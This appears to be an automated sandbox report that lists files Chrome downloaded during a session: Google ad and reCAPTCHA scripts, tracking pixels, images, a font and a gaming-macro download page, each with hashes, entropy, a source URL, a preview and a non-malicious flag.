                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:192:KVKggNVkMIW1fprYVczzz5jknVAAi1fTbg1fV8shSsmdYI6TbmvkvxD:sMVkMJxfzf5InVniiThTcOxD
                                                                                                                                                                                                                                                                                                                      MD5:4A3A02542BBD6D260AFD680F4EB9F0CE
                                                                                                                                                                                                                                                                                                                      SHA1:C368D3DCA48E4821725DBA39220ABF4D388BB519
                                                                                                                                                                                                                                                                                                                      SHA-256:55B64C16025EA72D28B1023DA02FBCD12A1ED0B97D60E39E6BFEF15B506758FD
                                                                                                                                                                                                                                                                                                                      SHA-512:2FC2CE8CA52EC44E4B2B8151C6CA5F71732E9EBD02B6546D47F3F9F43D387DB3E4C2EAACCA6EE74551C21A01D172425E0D97D1A250B52C77C3492DD83A1BAAF6
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://tpc.googlesyndication.com/simgad/5847665996604479684/14763004658117789537
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR.......|.....3cg....uPLTE3.&..........x...V.K...}.t.......^.T.............v.m=.0..........E.9S.HI.=\.Qo.f.........i.`...........X...`zTXtRaw profile type APP1..X..[.$..E.{...=..rHQ2.0lc.........0....]......................._._..}.o.....,YEy3...K......yWx3...o_s$.t.......3z.y..9 ..q..mk.RL..X>R....._.JR.3.....O]..Zg.=.\{].U......^.|&..&.]..H....^2.....e.0N..q....>..r....'...?.|..{.s@T:......>.:f..<......:.. e._7...v....+..O.=.<.+Ys{.M..|r^.y.<J)RJ>E8.p.|.$..:....;...a,....wGyr.F.>((.c.R.1~s.............'V2......".;..1BE.,....|..[....&B._5.JL..U.....&..rn._..J.g.....2...P...K^...5...g....*..3....>.......+9.1/fW.w..V.0..k....0f..*.O.3.W....vX.JX.J..>z?..6gP:..mV..6S.*.5goP...d...!.}..U..m.[...w....;....t..)..!> .q..~N....Pk.l.....%..5..c..GsmG....V+....{q......o..W.I.Vt,tEu...cio\...........6....V..L.^vY..K.4....N...d.S..~.0)X..D.v...W&-......?.GG[.....U..h.$?.......^.r.L6@u..u.j=s.}Fe....K..&..n^u.`...
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (829), with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):829
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.403227044332781
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:24:4HksUq5/Jz2pRNrBZJuvu8goqc0ioNhc+a4+mI:2fz2bNrVENtmN+y+j
                                                                                                                                                                                                                                                                                                                      MD5:D2ED487ACCE579A7D55059BD7485CA8F
                                                                                                                                                                                                                                                                                                                      SHA1:D730760FF8DD5147962C7953FE2CD84DF0428675
                                                                                                                                                                                                                                                                                                                      SHA-256:66478CC4838BB9394D9352335C707F774C32B83092434A48F3C61DE4E4706623
                                                                                                                                                                                                                                                                                                                      SHA-512:5D3944B84309E11A5877CBFEED02162C793991211C07280D65F546B49BFE5C1DA526F215FD4A52878ED2C095BA05C1FB2243883096142412A1CBAE5B0F4118FB
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://www.google.com/recaptcha/api2/aframe
                                                                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE HTML><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"></head><body><script nonce="yzlf5z9j8s6u6hdjt5SLEA">/** Anti-fraud and anti-abuse applications only. See google.com/recaptcha */ try{var clients={'sodar':'https://pagead2.googlesyndication.com/pagead/sodar?'};window.addEventListener("message",function(a){try{if(a.source===window.parent){var b=JSON.parse(a.data);var c=clients[b['id']];if(c){var d=document.createElement('img');d.src=c+b['params']+'&rc='+(localStorage.getItem("rc::a")?sessionStorage.getItem("rc::b"):"");window.document.body.appendChild(d);sessionStorage.setItem("rc::e",parseInt(sessionStorage.getItem("rc::e")||0)+1);localStorage.setItem("rc::h",'1730398782744');}}}catch(b){}});window.parent.postMessage("_grecaptcha_ready", "*");}catch(b){}</script></body></html>
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1055)
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):2690
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.39866636776827
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:48:Otg7xBqHIN7QaE9Fa9FZpPiNmgrZyHicju8m5I0zRHkFRCmTx:fN7Qabhiwdicju8WhRHMnTx
                                                                                                                                                                                                                                                                                                                      MD5:76A4D84DE75340D59CA06503A14184D4
                                                                                                                                                                                                                                                                                                                      SHA1:2FE3C4A95AF88BE57D1912BB09DC463F69924402
                                                                                                                                                                                                                                                                                                                      SHA-256:66E9BF446316F6EEC5EAEFA7098592BBD2144A60EB38C481DB233A6CA8B8D94A
                                                                                                                                                                                                                                                                                                                      SHA-512:2ABE6C816B265B72A8023E8F832B9BED0FFD2C931BA07C5DA1AE0CB5D60178CBD1CEA9CE6AE0BB88F77614954C20836342AD6BAFE25EB1CA4D2AEB495E4E2BD2
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:(function(){'use strict';function f(a,b,e){a.addEventListener&&a.addEventListener(b,e,!1)};/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .function g(a,b,e){if(Array.isArray(b))for(var c=0;c<b.length;c++)g(a,String(b[c]),e);else b!=null&&e.push(a+(b===""?"":"="+encodeURIComponent(String(b))))};function l(a=document){return a.createElement("img")};function m(a,b,e=null,c=!1){n(a,b,e,c)}function n(a,b,e,c){a.google_image_requests||(a.google_image_requests=[]);const d=l(a.document);if(e||c){const k=h=>{e&&e(h);if(c){h=a.google_image_requests;const v=Array.prototype.indexOf.call(h,d,void 0);v>=0&&Array.prototype.splice.call(h,v,1)}d.removeEventListener&&d.removeEventListener("load",k,!1);d.removeEventListener&&d.removeEventListener("error",k,!1)};f(d,"load",k);f(d,"error",k)}d.src=b;a.google_image_requests.push(d)};function p(a=null){return a&&a.getAttribute("data-jc")==="22"?a:document.querySelector('[data-jc="22"]')};var q=document,r=window;functi
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):15390
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.981710859869424
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:384:7ongf2TBlfgiAkVm6mSe0fGayL0u7Oan4tCZd+v1v5G3FPTT3wf9v3po:7obfjAkIlT0Fy/N4tg2xGVfoC
                                                                                                                                                                                                                                                                                                                      MD5:EA76156E28E493E4BC53BAEB6067E19F
                                                                                                                                                                                                                                                                                                                      SHA1:2F17563BC0554843E5E26E9C43484053AA0B288B
                                                                                                                                                                                                                                                                                                                      SHA-256:03FC9A897498F42889AA376C0DA9962D4ED3CFE59E5F3C15F2DF7EC0BE5F812F
                                                                                                                                                                                                                                                                                                                      SHA-512:405CEABB8784B66EE780F1A71E6818E59EDD732D886693D78CAD3F5BF462CC0CDE0CF12352F8E1574800080AA7E2903B474CC654862F578C57EB413E57710F93
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://a.fsdn.com/con/app/proj/tmacro/screenshots/tgmacro0.png/max/max/1
                                                                                                                                                                                                                                                                                                                      Preview:RIFF.<..WEBPVP8L.<../E...5.#.m$I....J.+.....`v..$%ip..r.e............Bb..-.V_s.......E25.GlK..._..L..&..V.o.hq.x.......)..8.u..v..l.......[f....0/.........4efn...~.......)ef........O....U..Z..Eg.4.em|.W.2..di.Ye....)..{r.S..fwR..6...}a.a...%..e..).8:.hwT9+...J.H..S....F.+..f...J...a....l...w..'.Y}.:..$m..:...N+.*..C%....q......[-W.#w...z...3.$m..6.U..M..ev<....+. .EO.UVe.F...+....W`.P......1.m.m.m.m.m.8Z.mU..}...x'M.m^./.eg.....].m...vw.......(..t..e.m.m{....L_......x...3..y&Bl.n:.k.7..g...l3Rl{..v.=X..m..q...'\F.mD..D....S....m....m.6.m.....Q...lc.$5..lgg.6.m...m..m{....i..;.$IQ..s.;.'..?.m.....q.....c@t..s.$....3.'.......l..._...{+..O.NYD..@*.....L..^o.a(............'yf .f?...s..|..9.Uf..'Co..ml[mtk........#U@}T@...by........8.%]...2...k...c......g...l.m.m.m..u..}_...Elc6v.}.;Yv..oq2...gc...c..:u...:.n.f..i..w3.V..8S.O.T.......g.Vm.u..lp.=y...|..;]g....c[}.3....F."..........-@......N3r..$.f......Hc..........e...6.2c.:..v.8.
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2020)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):9321
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.488083545900101
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:192:hAdU2WTFZOKRme5HNf4E/Q3uuNQ8Qd3yuM9lFEjr5zG:hAd9WTvOYB5R4E/QeuNVK3yu6lF6r4
                                                                                                                                                                                                                                                                                                                      MD5:35F2DD7CDD8EA7BEF7DD50FCA553A4A9
                                                                                                                                                                                                                                                                                                                      SHA1:35FAD9B309BE65A4200B417E608DE9068649D701
                                                                                                                                                                                                                                                                                                                      SHA-256:9F0E4A972197AF0DF6B45A3499BDA7BC8004A8D049673AF7076C867136C2A515
                                                                                                                                                                                                                                                                                                                      SHA-512:335D139CF2C0A3BAE76B977129C66AA54AAF8BD87B8229CD465D0F2868430AE4572F1AC913539F65057E805B90BF172D6938F01DE7D974EF007DFC8955C37575
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://www.gstatic.com/mysidia/35f2dd7cdd8ea7bef7dd50fca553a4a9.js?tag=engine/client_fast/client_fast_engine
                                                                                                                                                                                                                                                                                                                      Preview:(function(){'use strict';/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var h=this||self;function k(a,b){a=a.split(".");var c=h;a[0]in c||typeof c.execScript=="undefined"||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||b===void 0?c[d]&&c[d]!==Object.prototype[d]?c=c[d]:c=c[d]={}:c[d]=b};function aa(a){h.setTimeout(()=>{throw a;},0)};var l,p;a:{for(var q=["CLOSURE_FLAGS"],r=h,u=0;u<q.length;u++)if(r=r[q[u]],r==null){p=null;break a}p=r}var v=p&&p[610401301];l=v!=null?v:!1;var y;const z=h.navigator;y=z?z.userAgentData||null:null;function A(a){return l?y?y.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function B(a){var b;a:{if(b=h.navigator)if(b=b.userAgent)break a;b=""}return b.indexOf(a)!=-1};function C(){return l?!!y&&y.brands.length>0:!1}function D(){return C()?A("Chromium"):(B("Chrome")||B("CriOS"))&&!(C()?0:B("Edge"))||B("Silk")};!B("Android")||D();D();B("Safari")&&(D()||(C()?0:B("Coast"))||(C()?0:B("Opera"))||(C()?0:
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://cm.g.doubleclick.net/pixel?google_nid=whaleco_services_llc&google_push=AXcoOmRTXTUn1Pr6awWAnQRPgchY6LBTD7UWgfftnoBHloxfG5GmoNInKY9_iM4LiUT3GONf9BhydenY40DkAIQfixnY9Gu6A9hJZS1O
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (841), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):12566
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.020674237139358
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:192:0tovq07svqqKvaas5OyHoUxRtVKScSt0h3u3sRgk2fsMRQuJztH:0mvq07svqhROxRtVK/uVnj3ztH
                                                                                                                                                                                                                                                                                                                      MD5:C15F8C9AE9F46DA539086B03F059EAF3
                                                                                                                                                                                                                                                                                                                      SHA1:FCFB9F45613B41781E54C18F3EE5F36DA5A5EFF1
                                                                                                                                                                                                                                                                                                                      SHA-256:D9CF3BE51344F26074A1AD21695D757E021DC734945028B76DEA2A0B77DBBCB6
                                                                                                                                                                                                                                                                                                                      SHA-512:16D7CCB50CDDA5AE12F667C4B9D880933C67AE863B33577CA8588F89D8864A0F2A3B2CD35A7CA75DCB0AE2AB92C3A771D8E4F24CBDEA249113927AF7AED777D6
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://trksyln.net/Error
                                                                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="utf-8" />.. <meta content='text/html; charset=utf-8' http-equiv='Content-Type'>.. <meta http-equiv='X-UA-Compatible' content='IE=edge'>.. <meta name='viewport' content="width=device-width,height=device-height, initial-scale=1, shrink-to-fit=yes">.... theme colors -->..<meta name="theme-color" content="default" />..<meta name="apple-mobile-web-app-status-bar-style" content="default">..<meta name="apple-mobile-web-app-capable" content="yes">..<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">...... Basic meta info -->..<meta name="keywords" content="gaming macro software, macro recorder for gaming, keyboard and mouse macro for gaming, gaming automation software, tgm macro for pc gaming, rapid-fire macro software, gaming macros and shortcuts, macro tool for competitive gaming, tgm gaming macro for streamers, macro editor for gaming, tgmacro, tgm gaming macro, tgmacro download, tgm
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):604
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.573620174038291
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:12:6v/7dkfFQPHl09Kor6EHz1g+WVmObBbBbaLPIpTIiVojx5cF8NonhstcAzhu1:CkEl0nr6EHz1VWV33ePIpTzVojx5p6nH
                                                                                                                                                                                                                                                                                                                      MD5:7BD42E5A35B5FB3FF852D6EA9191CA83
                                                                                                                                                                                                                                                                                                                      SHA1:8A141EB392A05A2DEA3DCD83B97940EF70A81EBC
                                                                                                                                                                                                                                                                                                                      SHA-256:5C4A713EE4250851232BE9F9F68D41586BE39B299528CFC7266E0B0E7E582E1B
                                                                                                                                                                                                                                                                                                                      SHA-512:6FF31ACB937D6944570A837BB77AED92DAE41D71681440DC4765758FC40585F55999F2CDD78C4CE76A5AB414331BA9959BAFCFEF7E85B756AAB899C247F02890
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://www.gstatic.com/images/icons/material/system/2x/settings_grey600_24dp.png
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...0...0.......1....#IDATx...MKTQ...3...K...gP.Eo.Z$..6......"0..."..E-Z...C....+..E.T...JH/.HC.$d...y..."..W...w.3..3..9... ^..Fr4R.Q.....H<...\...V.[...v.L.D...y.wYQ....]....w&...|F...iz8..b.s.r..[.H..5..5D..[@.ed.-...O..=..G..lpD.R.F".J....... .. y*..$>.)V.`..quuP4.W9.}....*..y......~E}.7....IU.~.!.Ak.>....A..o..._.....7.4...{.K..6o.O..5.0n.`..z...V."^. 0.x=..^M...*t...H..9.B.(UD..>heD......."....W..T.E..0D.fYfI..3.-.G".....#.p....q.......Bv..{5.!u.F.i.......[.s.)....I....v.....Y.P.5?...n.'.......;...T......f......Q...~...8.....h.......T3<........IEND.B`.
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 25900, version 1.0
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):25900
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.991434457298154
                                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                                      SSDEEP:384:OLTqy78VCAYDZlFxnX78TiR2edW0GDVOCXU59Pt0jIKYf8cApL5s5AOw5+aAPc7:gvH5DZBnXgTiR2TDoV5eWUcuHoc7
                                                                                                                                                                                                                                                                                                                      MD5:E8B4671738219A2B2E873F10815FB415
                                                                                                                                                                                                                                                                                                                      SHA1:8BF71661E8FBC3ED29996367712C41FAE0F6CB23
                                                                                                                                                                                                                                                                                                                      SHA-256:E166664C0772A64D48BE8ADE6B4D59CF11DBF7CEEA6BEDFF6321A0E0D822A9D9
                                                                                                                                                                                                                                                                                                                      SHA-512:78EB38DA7B2007FEE9EAE5E144DF8682A238BAF50F41619A010BD38A9C9DF77A02A476E9E103098FFB9A03A7A5B76D33059764C246DF60CD9D4C48DF170EA4DB
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://fonts.gstatic.com/s/baloopaaji/v21/8AttGsyxM5KQQU-Y4MTwVanUqRo.woff2
                                                                                                                                                                                                                                                                                                                      Preview:wOF2......e,.......`..d.............................h..R.`..t.....v........5..R..6.$.. . ..$.....?...'..n@.n.@A.;.>V.ts'r;Q.@........).....l.X...C.l...^..{P.df)D..j..!tYY..C.X.zT... ..h`....R.Tyl.'%7....<.1dw...$.h.c.C-..............Cr.R..../j.0.a..m%..O.S.i....W..cJj.K...)..+.$5w4t$t......} .v"..c.%..h`......J..j.vp..[.8.<..:..?....U.`...$MT.V.N/......6m.xd...}.:...p.*t2D..`....1.&.V.,.4.[.`...b......:..4j..$...d..1..Y..4.o....*.*..J.......?..c....=VA.6..ac.....%Z.....=...._....+....w..5U+...3....n7.P...c.?.Y.@.B.....A.._e..q..p...S,..O........4.....\.Z../G...7.wB(....g.C..;9.......z}.N.....Mq5.s.j...A.K.a...o..J.;W.mf.d../.6......d,.e.r.W...[,......\._.{rM.|..4....=........c......;[...n..V|..S;#..:vX.J...G~.......(szks..0?..=..q..@.B^.01.......P...j7@...).;.....)...iC..-.}.4...Y`......W}.......{.+.?..1DATN.....?.....,.:[1I.....T..s.{..%W...X..uzH.T..4x..@..O.R p.K....ZE[._. !...4S.9.Y+.s.H._.^.^.....G... ...6..@..I.eI..m.i4E.q.i...y.
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2016)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):39635
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.519642162172215
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:768:qzYb3uSHMeNfX5m6cx/qbk/Bssq+2ZSgxIs9bWHGJ4CricXgTpg/4G0yl6qQHm5L:RDlO/qY/B82c8OACsvEF
                                                                                                                                                                                                                                                                                                                      MD5:CC42289087B3F73300F3C5E415B64EC5
                                                                                                                                                                                                                                                                                                                      SHA1:6601C16428E3F155F0F2A43A8BF8773A0E2F9C60
                                                                                                                                                                                                                                                                                                                      SHA-256:9713067914ACF51B1A42776C63F42801C2145580D8923848BDE24581C9157DC0
                                                                                                                                                                                                                                                                                                                      SHA-512:A2FD8E9024A0DCB41FC31C7F2B1CCE7ED7E320EA585F39DF963758B904A6472600C0BE12B814AD879E202632329DB49B391B61B4466A1E49A1E6415387F5C520
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://tpc.googlesyndication.com/pagead/js/r20241028/r20110914/client/one_click_handler_one_afma_fy2021.js
                                                                                                                                                                                                                                                                                                                      Preview:(function(){'use strict';/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=this||self;function aa(a,b){a:{var c=["CLOSURE_FLAGS"];for(var d=m,e=0;e<c.length;e++)if(d=d[c[e]],d==null){c=null;break a}c=d}a=c&&c[a];return a!=null?a:b};const ba=(new Date("2024-01-01T00:00:00Z")).getTime(); .function ca(a){a=a.s;const b=encodeURIComponent;let c="";a.platform&&(c+="&uap="+b(a.platform));a.platformVersion&&(c+="&uapv="+b(a.platformVersion));a.uaFullVersion&&(c+="&uafv="+b(a.uaFullVersion));a.architecture&&(c+="&uaa="+b(a.architecture));a.model&&(c+="&uam="+b(a.model));a.bitness&&(c+="&uab="+b(a.bitness));a.fullVersionList&&(c+="&uafvl="+b(a.fullVersionList.map(d=>b(d.brand)+";"+b(d.version)).join("|")));typeof a.wow64!=="undefined"&&(c+="&uaw="+Number(a.wow64));return c} .function da(a,b){return a.g?a.m.slice(0,a.g.index)+b+a.m.slice(a.g.index):a.m+b}function ea(a,b=0){let c="&act=1";b===0?c+="&ri=1":b===1?c+="&ri=24":b===2&&(c+="&ri=25");a.l&&a.s&
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2415)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):2754
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.193623900439384
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:48:fwNdf9pTzTPvwsR2r2U4b3Ybk5JwYsH2/zlq9/S2sQBiETswEqHBnAFswkcK0MUG:f4df9hTHwsR2jk5sH2/2VzTmq6kRMkL
                                                                                                                                                                                                                                                                                                                      MD5:1CBBCCA1D53705256FE48B2DE6354B29
                                                                                                                                                                                                                                                                                                                      SHA1:3B0B68688A39F7109FA0A709A8B74EE690A97F4D
                                                                                                                                                                                                                                                                                                                      SHA-256:935B0999723A39EBAA3777EBCE2ED743881FD3776AA10393CE760AB0DBEACDF1
                                                                                                                                                                                                                                                                                                                      SHA-512:1A00FCC414F9C4EE9D046FB2A8F64B5219D06237B538F92972B8187F00A8942837B5EB734268855EAE1D4459FB19D9A5992D96064397C50B8DDC4EADCD376ED8
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://cdn.jsdelivr.net/npm/bootstrap-affix@1.0.1/assets/js/affix.min.js
                                                                                                                                                                                                                                                                                                                      Preview:/**. * Minified by jsDelivr using Terser v5.19.2.. * Original file: /npm/bootstrap-affix@1.0.1/assets/js/affix.js. *. * Do NOT use SRI with dynamically generated files! More information: https://www.jsdelivr.com/using-sri-with-dynamic-files. */.!function(t){"use strict";var i=function(e,o){this.options=t.extend({},i.DEFAULTS,o),this.$target=t(this.options.target).on("scroll.bs.affix.data-api",t.proxy(this.checkPosition,this)).on("click.bs.affix.data-api",t.proxy(this.checkPositionWithEventLoop,this)),this.$element=t(e),this.affixed=null,this.unpin=null,this.pinnedOffset=null,this.checkPosition()};function e(e){return this.each((function(){var o=t(this),f=o.data("bs.affix"),n="object"==typeof e&&e;f||o.data("bs.affix",f=new i(this,n)),"string"==typeof e&&f[e]()}))}i.VERSION="3.3.7",i.RESET="affix affix-top affix-bottom",i.DEFAULTS={offset:0,target:window},i.prototype.getState=function(t,i,e,o){var f=this.$target.scrollTop(),n=this.$element.offset(),s=this.$target.height();if(null!=e&&"t
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1200 x 627, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):3875
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.21080746216504
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:96:oMFiuNE7qj8MThYnWHK8HF3LLDNrFPX05c39:7NNgATXK2dPNrFPH
                                                                                                                                                                                                                                                                                                                      MD5:BD1466C2FFB9640B0C062AEE954C83B2
                                                                                                                                                                                                                                                                                                                      SHA1:E27657B673A90092D21E1F2AB7519FB78176A9EC
                                                                                                                                                                                                                                                                                                                      SHA-256:3F1BCC40B33449E15AE643DA68AD4DF9E525197DBEF09CBC612661B64C4A583D
                                                                                                                                                                                                                                                                                                                      SHA-512:8C4016579573B081773D2F58BF5AB905187AC78BE20E1DCBE48A17D03084E9E2E878BF8061409D3DA388BCE7B97189D2C4E39FC712DB5F0614FDCD18919A6CB5
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
